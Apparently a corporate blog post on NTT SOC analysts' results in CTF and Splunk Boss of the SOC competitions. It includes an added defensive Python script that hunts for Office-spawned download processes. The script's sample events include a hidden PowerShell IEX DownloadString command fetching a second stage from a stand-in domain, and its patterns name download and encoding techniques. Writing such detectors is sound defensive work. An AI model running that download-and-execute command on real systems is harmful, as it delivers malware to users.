Competing in Cyber Security
One of the great challenges of cyber security is the need to learn continuously. Just as our adversaries adapt and change all the time, we need to remain one step ahead of them. This is especially true of the analysts in our SOC, who never stop learning. The SOC is the front line, where analysts are exposed to the latest exploits developed by threat actors. That exposure, on its own, isn’t enough, however. That is why our analysts are on a continuous quest to learn from their peers and from the industry.
One exciting and rewarding way for our analysts to test themselves and learn from their peers is by participating in cyber security competitions. These are highly competitive events where analysts get to pit themselves against peers from other organizations in events which test both their skill and their resolve to overcome adversaries in high-pressure situations. In some cases, analysts even get the chance to take on the role of the attacker, which helps them to better understand the tactics and strategies used by their adversaries.
Our SOC teams have participated in a number of cyber security competitions and have achieved top results against other highly skilled teams, consistently placing in the top 1%. The list below summarizes some of our achievements in recent years.
- 65th Cyber Apocalypse CTF 2024 among 5694 teams
- 5th Splunk Boss of the SOC EMEA 2023 among 1100 teams
- 17th Cyber Apocalypse CTF 2022 among 7024 teams
- 17th Hack the Box Business CTF Dirty Money 2022 among 657 teams
- 6th Splunk Boss of the SOC v6.conf21 2021 among 425 teams
- 2nd Splunk Boss of the SOC Nordic 2020 among 43 teams
- 1st and 2nd Splunk Boss of the SOC Helsinki 2019 among 14 teams
Capture the flag (CTF) competitions have become increasingly popular among cyber security professionals, providing a fun and engaging way to test and improve skills. To succeed in a CTF competition, participants must have a strong understanding of a wide range of security concepts and techniques. These may include cryptography, web security, reverse engineering, forensics, exploit development, and programming. Participants must use their expertise and problem-solving abilities to complete the challenges and earn points or capture the flag.
The joint NTT team EntitySec, which includes members from the Japan SOC, Sweden SOC, and Offensive Security teams, has had the opportunity to compete against several of the most respected security firms in the industry at the Cyber Apocalypse CTF hosted by Hack The Box in March 2024. Among 5694 competing teams, they proudly secured the 65th spot, with an impressive tally of 52 out of 64 flags captured (81% completion). Notably, they achieved a flawless performance in the Forensics category, seizing all 10 flags available. Challenges encompassed intricate tasks like Network Analysis, Malware Analysis, and Memory Forensics.
At another CTF event, one of our analysts who successfully solved a malware-analysis challenge offered some great feedback on the real-world value of that challenge: “We received an email with a suspicious document attached. The document contained a malicious VBA script that attempted to download malware when the user opened it. We were able to obtain the malware and reverse engineer it to find the flag that was hidden within it.” This technique has been observed in multiple malware families, including Emotet, IcedID, and Dridex.
Another popular cyber security competition is Boss of the SOC (BOTS), organized by Splunk. BOTS is a cyber security competition in which participants attempt to detect and respond to simulated security threats in a SOC environment. The participants are typically presented with a set of simulated network environments and are asked to detect and respond to security threats in real time. These threats may include malware, network intrusions, and other types of cyber-attacks.
One of our team members who participated in BOTS describes it this way: “BOTS puts our threat hunting skills to the test. We got to make use of different logs, statistics, geolocation, and more to hunt for everything from APT groups to kidnapped toads.” Another member added: “BOTS pushed my problem-solving skills to the limit and taught me new strategies that have been useful in my role as an analyst.”
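The two passages above share one defensive question: how does a SOC spot a macro-laden document that fetches a second stage, using only the logs a hunt like BOTS hands you? The script below is an added example written for this page; it is not code from the original post or from NTT. It scores process-creation events in the shape of Sysmon Event ID 1 (the `Image`, `ParentImage`, `CommandLine` and `Computer` field names are that assumption), flags an Office application spawning a scripting or download-capable child, and raises the score when the child's command line carries download markers. The four events, host names, user names and `.example` domains are constructed for the demonstration, and the weights and threshold are arbitrary starting points to tune against your own baseline.

```python
"""Hunt for Office-spawned download behaviour in process-creation logs.

Added example, not the original post's code. Field names follow Sysmon
Event ID 1 (assumption); sample events below are constructed.
"""
import json
import re

# Office applications that should rarely spawn scripting or download tools.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Children commonly abused to fetch and run a second stage.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Command-line markers that suggest a download or an attempt to hide one.
DOWNLOAD_MARKERS = [
    ("download cmdlet", re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)),
    ("encoded command", re.compile(r"-enc(odedcommand)?\b", re.I)),
    ("certutil urlcache", re.compile(r"urlcache", re.I)),
    ("URL in command line", re.compile(r"\bhttps?://", re.I)),
]
URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    score, reasons = 0, []
    # Parent/child pairing is the strongest signal: +50 on its own reaches the threshold.
    if parent in OFFICE_PARENTS and child in SUSPICIOUS_CHILDREN:
        score += 50
        reasons.append(f"{parent} spawned {child}")
    # Each distinct download marker adds +15; a non-Office parent alone stays below threshold.
    for name, pattern in DOWNLOAD_MARKERS:
        if pattern.search(cmdline):
            score += 15
            reasons.append(f"command line: {name}")
    urls = URL_RE.findall(cmdline)
    if urls:
        reasons.append("URLs: " + ", ".join(urls))
    return score, reasons


def hunt(events, threshold: int = 50) -> list[dict]:
    """Return an alert record for every event at or above the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({
                "host": ev.get("Computer", "?"),
                "process": basename(ev.get("Image", "")),
                "score": score,
                "reasons": reasons,
            })
    return alerts


def hunt_json_lines(lines, threshold: int = 50) -> list[dict]:
    """Same as hunt(), for newline-delimited JSON as exported from a SIEM."""
    return hunt((json.loads(line) for line in lines), threshold)


# Constructed sample events (hypothetical hosts, users and domains).
SAMPLE_EVENTS = [
    {   # Word launching PowerShell that pulls a script from the web: high score
        "Computer": "WS-FIN-07",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient)"
                       ".DownloadString('http://invoice-update.example/stage2.ps1')\"",
    },
    {   # Excel launching a script host from a temp folder: parent/child pairing alone
        "Computer": "WS-HR-12",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
        "Image": "C:\\Windows\\System32\\wscript.exe",
        "CommandLine": "wscript.exe //B //Nologo C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice_2024.js",
    },
    {   # Admin download from Explorer: markers fire but no Office parent, below threshold
        "Computer": "WS-IT-03",
        "ParentImage": "C:\\Windows\\explorer.exe",
        "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
        "CommandLine": "powershell.exe -Command \"Invoke-WebRequest "
                       "http://intranet.example/installers/agent.msi -OutFile C:\\Temp\\agent.msi\"",
    },
    {   # Word spawning its print helper: benign, scores nothing
        "Computer": "WS-FIN-07",
        "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
        "Image": "C:\\Windows\\splwow64.exe",
        "CommandLine": "C:\\Windows\\splwow64.exe 12288",
    },
]
SAMPLE_JSON_LINES = [json.dumps(ev) for ev in SAMPLE_EVENTS]

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python hunt_office_children.py events.jsonl
        with open(sys.argv[1]) as fh:
            alerts = hunt_json_lines(line for line in fh if line.strip())
    else:  # no file given: run against the constructed samples
        alerts = hunt(SAMPLE_EVENTS)
    for alert in alerts:
        print(json.dumps(alert))
```

Run without arguments to score the constructed events, or pass a file of newline-delimited JSON events exported from your SIEM. The design point is that the Office parent plus scripting child pairing is weighted to alert on its own, because macro droppers frequently stage their download through a child process whose command line you may never see in full, while download markers without that pairing (an administrator pulling an installer from Explorer) stay below the threshold and are left for a looser hunt query.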
Overall, CTF and BOTS competitions provide a unique and exciting opportunity for security professionals to test and improve their skills. These competitions are challenging and engaging and can help participants to stay sharp and up-to-date on the latest security technologies and techniques. Whether you are a seasoned veteran or a newcomer to the field of security, participating in a CTF or BOTS competition can be a rewarding and valuable experience.
Cyber security competitions provide a competitive proving ground where our analysts can hone their skills. The experience they build from the perspective of both the defender and the attacker provides them with an invaluable edge. NTT’s Samurai Managed Detection and Response service relies on the continuous learning that our analysts undertake so that we can keep ahead of threat actors as we defend our clients.